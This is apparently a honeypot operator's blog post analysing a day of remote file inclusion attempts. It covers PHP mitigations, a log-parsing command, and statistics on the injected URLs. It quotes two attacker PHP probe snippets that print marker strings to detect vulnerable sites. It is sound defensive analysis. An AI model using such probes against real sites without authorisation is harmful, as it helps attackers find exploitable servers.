Today, we will take a quick look at remote file inclusion (RFI). Based on our web honeypot project, RFI is by far the most common exploit attempt. Most of the vulnerabilities exploited are rather old. But it appears still worthwhile to these attackers to give it a try.
There are a number of simple configuration choices which will prevent exploitation of most of these problems, even if the old software is still install. For example:
- turn off register_globals
- turn off allow_url_include
These settings are turned off by default in recent PHP versions. While they do not prevent all RFI exploits, they do prevent the exploits attempted by these simple scripts.
Basic vulnerable code looks like:
The reason for code like this is to provide a mechanism to include a customizable template or configuration file. For example, a user may switch a sites look to use a "green" template by calling the page with
If the file name is not sufficiently validated, the following exploit is possible:
Now "remoteshell.php" will be executed.
For this blog, I cut the URLs from my access log and grepped my for "=http", which doesn't get all attempts, but enough to tell this story. Some common false positive I see with this method are Google analytics parameter passed in the URL, for example from twitter links:
(shortened to fit the line)
After accounting for this issue, I was left with 3053 attempts (one day!), and 1548 unique requests.
Next I cut all unique RFI URLs out of the log. The shell command at this point:
cut -f2 -d'"' rfi | grep '=http' | grep -v 'utmr=http' | sed 's/.*=http/http/'
| cut -f1 -d' '
(the file "rfi" is the result of an earlier grep)
I found a total of 109 distinct URLs people attempted to inject. The top 10 URLs are:
I was able to download 71 of the scripts. About half of them resulted in identical scripts:
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
This is apparently just a quick test to see if the site is vulnerable. If successful, the script will insert "FeeLCoMzFeelCoMz" in the site (and I will have to check how inserting this string here will affect these attacks ? )
another essentially identical script
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>,
made up for another 13 scripts.
At this point, I am left with about 20 scripts. Most of them added some system parameters like the output of 'id' or 'df' . The largest one came in at about 200kBytes! It implemented a typical IRC bot. But it appears that the IRC server is no longer functional.
Looking over these bots, there is very little original code. One reason for the prolific exploitation of these vulnerabilities may be the availability of plenty of sample exploit code which is easily implemented by the bottom tier of "script kiddies" who try to enter the "game" and are looking for an easy to execute exploit which requires little effort. Many of the exploit strings attempted appear to be implemented wrong to exploit the targeted vulnerability.